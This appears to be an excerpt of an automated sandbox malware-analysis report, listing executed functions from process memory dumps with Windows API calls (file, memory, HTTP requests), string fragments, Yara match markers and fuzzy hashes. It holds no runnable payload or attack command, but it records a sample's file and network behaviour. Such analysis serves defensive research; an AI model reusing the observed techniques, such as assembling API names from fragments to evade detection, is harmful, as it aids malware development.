Uniqueness

Uniqueness Score: -1.00%

Function 01179610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d712fdd9c451a0736f0eec30c2e51956ab52a8c3216a4f63979f0716596bb43
Instruction ID: 2a9ab6ce534e0337a793df6044c9459a305fc1bd9d7de0542a10f19c6139515d
Opcode Fuzzy Hash: 4d712fdd9c451a0736f0eec30c2e51956ab52a8c3216a4f63979f0716596bb43
Instruction Fuzzy Hash: DF90027160510802D55471999514B461005A7D0341F51C015E0015658DC7958A557AE1

Uniqueness

Uniqueness Score: -1.00%

Function 01179650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b1954f8654a21327e1ec818cba65664c948c12d9257a1b775938850ee2160e0
Instruction ID: b28dd01c586f5e21015f96717c2f3021cf1bff0601d695ac0f79b80002fae14d
Opcode Fuzzy Hash: 4b1954f8654a21327e1ec818cba65664c948c12d9257a1b775938850ee2160e0
Instruction Fuzzy Hash: E890027120514842D54471999504E461015A7D0345F51C015E0055698DD7658D55BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 011796D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e98e3246ee30c6b9a9065bb2f12b7c43d6a2d13a355d068a457a17e9ef3e9ad1
Instruction ID: 4bc9a2dd728ab8f35f4b9e8f4e15029af626784d936b75eff3de3825b60486bd
Opcode Fuzzy Hash: e98e3246ee30c6b9a9065bb2f12b7c43d6a2d13a355d068a457a17e9ef3e9ad1
Instruction Fuzzy Hash: E690027120110842D50471999504F461005A7E0341F51C01AE0115658DC755C8517961

Uniqueness

Uniqueness Score: -1.00%

Function 01179670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 5d0c2107e0470961d9325d84a4325a9ff22caae109bb81feb61b964faf05d48b
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 011CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E011CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0117CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E011C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E011C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x011cfdda
0x011cfde2
0x011cfde5
0x011cfdec
0x011cfdfa
0x011cfdff
0x011cfe0a
0x011cfe0f
0x011cfe17
0x011cfe1e
0x011cfe19
0x011cfe19
0x011cfe19
0x011cfe20
0x011cfe21
0x011cfe22
0x011cfe25
0x011cfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011CFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011CFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011CFE2B

Memory Dump Source

Source File: 00000001.00000002.715544167.0000000001110000.00000040.00000001.sdmp, Offset: 01110000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 18578c8f98faf4b47ece36c1d4ea8909833c173d9044569fc1672c5ee522373a
Instruction ID: 812f2e05cb9ac3381cb2876052c3f45c26188770db2a77fa95079975dfb96915
Opcode Fuzzy Hash: 18578c8f98faf4b47ece36c1d4ea8909833c173d9044569fc1672c5ee522373a
Instruction Fuzzy Hash: DAF0F632200612BFE6281A85DC06F63BF6BEB54B70F254318F628561E1DB62F87087F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: WWAHost.exe PID: 7052 Parent PID: 3424 WWAHost.exeCOMMON

Executed Functions

Function 003381B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00333B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00333B87,007A002E,00000000,00000060,00000000,00000000), ref: 003381FD

Strings

.z`, xrefs: 003381ED, 003381F8

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 06784933a7efec736a65eac4194f5201ad2b1b14da816a851fa004e555946cb2
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 4FF0B6B2204208ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 003381AB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00333B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00333B87,007A002E,00000000,00000060,00000000,00000000), ref: 003381FD

Strings

.z`, xrefs: 003381ED, 003381F8

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: a14cf5fbc9a6f6838688939c2f64dbdbdabf23761c39f29f9e97d7b3b80ce668
Instruction ID: a07b6ee43ce4b71f78ad8d0692507434df24b97e499caf742de8280250b37ee2
Opcode Fuzzy Hash: a14cf5fbc9a6f6838688939c2f64dbdbdabf23761c39f29f9e97d7b3b80ce668
Instruction Fuzzy Hash: 5101C4B2204108AFCB48CF98DC94EEB37A9AF8C754F158248FA1D97241C630EC11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003382E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =3,?,?,00333D20,00000000,FFFFFFFF), ref: 00338305

Strings

=3, xrefs: 003382FC, 00338304

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =3
API String ID: 3535843008-305444442
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 7955ce0fa4509ab713a368b14f560fb1efa0e00b5ba1876db6d30257d893a498
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 79D01776200314ABDB11EF98DC85EE77BACEF48760F154499BA189B282C930FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 003382DD, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL( =3,?,?,00333D20,00000000,FFFFFFFF), ref: 00338305

Strings

=3, xrefs: 003382FC, 00338304

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: =3
API String ID: 3535843008-305444442
Opcode ID: 7dcce6039fe78d45257413bbe0f235165d8f0f797f7cda187b462fda935c5cc9
Instruction ID: da3d4b71d63e5e0869272d49bc110db71677c9bb08859d04759394ec54271b22
Opcode Fuzzy Hash: 7dcce6039fe78d45257413bbe0f235165d8f0f797f7cda187b462fda935c5cc9
Instruction Fuzzy Hash: C6D01776200310BBDB11EF98DC85EEB7B69EF44361F154599BA1CAB382C930EA1487E0

Uniqueness

Uniqueness Score: -1.00%

Function 0033825A, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00333A01,?,?,?,?,00333A01,FFFFFFFF,?,B=3,?,00000000), ref: 003382A5

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 242bc1e8c806faec7718e4074518d79e2fd6af12b412593840e24586b640e1f8
Instruction ID: 652f008a3fa4f8589ee62a684c6846961f832db79ab04237e922558e83a360e7
Opcode Fuzzy Hash: 242bc1e8c806faec7718e4074518d79e2fd6af12b412593840e24586b640e1f8
Instruction Fuzzy Hash: 79F0F9B6204108AFCB14CF99DC81DEB7BA9EF8C354F158248FE0DA7241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00338260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,00333A01,?,?,?,?,00333A01,FFFFFFFF,?,B=3,?,00000000), ref: 003382A5

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: db505c2eea079afa739464592e00c9eb54ed87e765861fa86334801f256ed56a
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 99F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00338390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00322D11,00002000,00003000,00000004), ref: 003383C9

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 58892caa4d90c4267545c1c1d7d3d8b3b4771fd4f0a9255d74526f83abf7c630
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: D8F015B2200208ABCB14DF89DC81EEB77ADAF88750F118148BE0897241CA30F810CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 03199710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319971A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0b618b907d6a827d3cd8de7e1a1ab873ee5a2b45804bbea39b1461d87daca5e0
Instruction ID: e9be784da76097c7840e2861f53cedb898b43074cf110bc7650464344a6cc1dd
Opcode Fuzzy Hash: 0b618b907d6a827d3cd8de7e1a1ab873ee5a2b45804bbea39b1461d87daca5e0
Instruction Fuzzy Hash: DE9002B520184813D100A59D6518646000597E4342F91D015A5015595ECBA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03199780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319978A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 32fdb46e4547b3c6f7b3d9dbca2b89a03a9c70ed323c4a047da650fe5a931d63
Instruction ID: ae1289e21476dd08b00970f1b3a6398a36b586d7759956ce9326169ebef7d8fb
Opcode Fuzzy Hash: 32fdb46e4547b3c6f7b3d9dbca2b89a03a9c70ed323c4a047da650fe5a931d63
Instruction Fuzzy Hash: 439002AD21384413D180B15D651860A000597D5243FD1D419A0006598CCF5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 03199FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03199FEA

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 308d7b195664d60b26f02ae84ce19e79f60db9c80b694437caa89a1a0de9e0c5
Instruction ID: 63283a689c2374ee7d8c2e19d96033d94fff84b65d3d58a10efaf350fd585222
Opcode Fuzzy Hash: 308d7b195664d60b26f02ae84ce19e79f60db9c80b694437caa89a1a0de9e0c5
Instruction Fuzzy Hash: 889002B531198813D110A15D9514706000597D5242F91C415A0815598D8BD588917162

Uniqueness

Uniqueness Score: -1.00%

Function 03199A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03199A5A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f006271a14e077b25f3f472a71136ffa6e0442eda8f1b00971df475953e2df26
Instruction ID: 62dff6e6620cadb0888e9a00463ec74a06b3a2a73a1db1b25a6e35c1a46f5ebb
Opcode Fuzzy Hash: f006271a14e077b25f3f472a71136ffa6e0442eda8f1b00971df475953e2df26
Instruction Fuzzy Hash: 639002A5211C4453D200A56D5D24B07000597D4343F91C119A0145594CCF5588616561

Uniqueness

Uniqueness Score: -1.00%

Function 03199650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319965A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6faf38f7e15352b3e83f769c57e4fa83486e68deeaad7ba4cff1b26cd2c38bed
Instruction ID: 60ad3cad2b70ba17a2282859080fa231043b3bd1530dfe39e7cf272b38f359c5
Opcode Fuzzy Hash: 6faf38f7e15352b3e83f769c57e4fa83486e68deeaad7ba4cff1b26cd2c38bed
Instruction Fuzzy Hash: B99002B520588C53D140B15D5514A46001597D4346F91C015A00556D4D9B658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 03199660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319966A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebf6365936c6d0a7586bf8dce51c4453cee5c803980483ff078af2bc9949bb67
Instruction ID: 74c35173b244be36ad31137f1a30c3bb85f1a73ff741c2c466150cfa901cea76
Opcode Fuzzy Hash: ebf6365936c6d0a7586bf8dce51c4453cee5c803980483ff078af2bc9949bb67
Instruction Fuzzy Hash: 349002B520184C13D180B15D551464A000597D5342FD1C019A0016694DCF558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 031996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031996DA

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9adcb2d5423d76a5446de2f4417f3794ed562e89218064af840969218a78040
Instruction ID: 56bc603887d3e6574dc370118b662114fece0ebad8f85cd9cfad9ff3007e2838
Opcode Fuzzy Hash: a9adcb2d5423d76a5446de2f4417f3794ed562e89218064af840969218a78040
Instruction Fuzzy Hash: 539002B520184C53D100A15D5514B46000597E4342F91C01AA0115694D8B55C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 031996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031996EA

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85675eeae0e96afdd097ac7dd8dd90c2c6fb3ac5fb7b60a4b11f7a8d61df8bc0
Instruction ID: 84450e05246eda1df7a59a62a98dbe5ab45d2c8433951be59114995fa3c0cd08
Opcode Fuzzy Hash: 85675eeae0e96afdd097ac7dd8dd90c2c6fb3ac5fb7b60a4b11f7a8d61df8bc0
Instruction Fuzzy Hash: CF9002B52018CC13D110A15D951474A000597D4342F95C415A4415698D8BD588917161

Uniqueness

Uniqueness Score: -1.00%

Function 03199910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319991A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 44c05fcb49bf95e13ce92b5521fc5e240d9a0321c137d8244845ab2107ec3e9b
Instruction ID: 3977f263caae6ce5f44922758014cb79b78c10e9083db423ce77a0eca0daf580
Opcode Fuzzy Hash: 44c05fcb49bf95e13ce92b5521fc5e240d9a0321c137d8244845ab2107ec3e9b
Instruction Fuzzy Hash: 6B9002F520184813D140B15D5514746000597D4342F91C015A5055594E8B998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 03199540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319954A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b44286afa92aff61551764efd03c5e6baa6cf01bc746aa37a4e25ce12b94cd3
Instruction ID: 70e8e003ccd03158cc3a8c3dbd69b8dc788569fdb50a7aec4ed8d24842f0d6f2
Opcode Fuzzy Hash: 4b44286afa92aff61551764efd03c5e6baa6cf01bc746aa37a4e25ce12b94cd3
Instruction Fuzzy Hash: E49002A9211844130105E55D1714507004697D9392391C025F1006590CDB6188616161

Uniqueness

Uniqueness Score: -1.00%

Function 031999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031999AA

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc850cc9c96d74f62f0a501a7325683537e34bf4cbd6e7e4115665d6d3e84594
Instruction ID: f909513c75622a6a701279f0ca9349d2db56e8f687d77b7c55d0c3b9cc27b341
Opcode Fuzzy Hash: bc850cc9c96d74f62f0a501a7325683537e34bf4cbd6e7e4115665d6d3e84594
Instruction Fuzzy Hash: 5E9002E534184853D100A15D5524B060005D7E5342F91C019E1055594D8B59CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 031995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 031995DA

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 35767bde060969b6ab9797420d2bc15275fa5216e75afdb1a054e14c2628b8b8
Instruction ID: 66901bf1435318015b12efb418d9ab648466358786852d8ee007dde2e99f37e9
Opcode Fuzzy Hash: 35767bde060969b6ab9797420d2bc15275fa5216e75afdb1a054e14c2628b8b8
Instruction Fuzzy Hash: C29002E5202844134105B15D5524616400A97E4242B91C025E10055D0DCB6588917165

Uniqueness

Uniqueness Score: -1.00%

Function 03199840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319984A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6b2dbad886d131b2cfdcfcc9109d06bd8f61a347a54b7cedba96935d143a83a
Instruction ID: bf9d86da5bc15fcf93b0fd2f7ba719d052468c5f25aee3bc6c30189eebcad946
Opcode Fuzzy Hash: f6b2dbad886d131b2cfdcfcc9109d06bd8f61a347a54b7cedba96935d143a83a
Instruction Fuzzy Hash: 8D9002A5242885635545F15D55145074006A7E42827D1C016A1405990C8B669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 03199860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0319986A

Memory Dump Source

Source File: 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp, Offset: 03130000, based on PE: true

Associated: 00000006.00000002.1030239958.000000000324B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.1030249513.000000000324F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87194f74cb70ba76b6fb84e37f1ee57493b6f2599271f7e59430f187aaaf3a89
Instruction ID: 920c4cde01bdb8b03639b463673132c2892ebaa691a76d475b8cc1cc5905ec13
Opcode Fuzzy Hash: 87194f74cb70ba76b6fb84e37f1ee57493b6f2599271f7e59430f187aaaf3a89
Instruction Fuzzy Hash: 5C9002B520184823D111A15D5614707000997D4282FD1C416A0415598D9B968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 003388C0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00338928

Strings

Http, xrefs: 003388DA
Open, xrefs: 003388E1
RequestA, xrefs: 00338922, 00338927
HttpOpenRequestA, xrefs: 003388CD, 003388D0
Requ, xrefs: 003388E8
OpenRequestA, xrefs: 0033891E, 00338926
HttpOpenRequestA, xrefs: 0033891A, 00338925
estA, xrefs: 003388EF

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction ID: d951b5fb054bc9c8f761d2822a05171c342ad986a3716397b210f336b3527fd7
Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction Fuzzy Hash: 1501E9B2905159AFCB14DF98D881DEF7BB9EB48210F158288FD48A7205D630ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 003388B7, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 45networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 00338928

Strings

Http, xrefs: 003388DA
Open, xrefs: 003388E1
RequestA, xrefs: 00338922, 00338927
HttpOpenRequestA, xrefs: 003388CD, 003388D0
Requ, xrefs: 003388E8
OpenRequestA, xrefs: 0033891E, 00338926
HttpOpenRequestA, xrefs: 0033891A, 00338925
estA, xrefs: 003388EF

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: f03fd9a4028eb42c75c9410c1dc8d4efcd381baf9edf5500d5c0bbb549b5ed2d
Instruction ID: 7338ad234a138573a18249aa9a9e738fc2edcede96f03c43ba9a62281aa8f0b1
Opcode Fuzzy Hash: f03fd9a4028eb42c75c9410c1dc8d4efcd381baf9edf5500d5c0bbb549b5ed2d
Instruction Fuzzy Hash: C1014CB2905259AFCB15DF98D881DEF7BB9EF48210F158248FD59A7205C730EE10CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00338940, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0033899C

Strings

HttpSendRequestA, xrefs: 0033894D
Http, xrefs: 0033895A
SendRequestA, xrefs: 00338992, 0033899A
RequestA, xrefs: 00338996, 0033899B
Send, xrefs: 00338961
estA, xrefs: 0033896F
HttpSendRequestA, xrefs: 0033898E, 00338999
Requ, xrefs: 00338968

Memory Dump Source

Source File: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction ID: fe714f97e9e734c35dc1ac1ba37e610655dafc54883e344c78b2db03045f1374
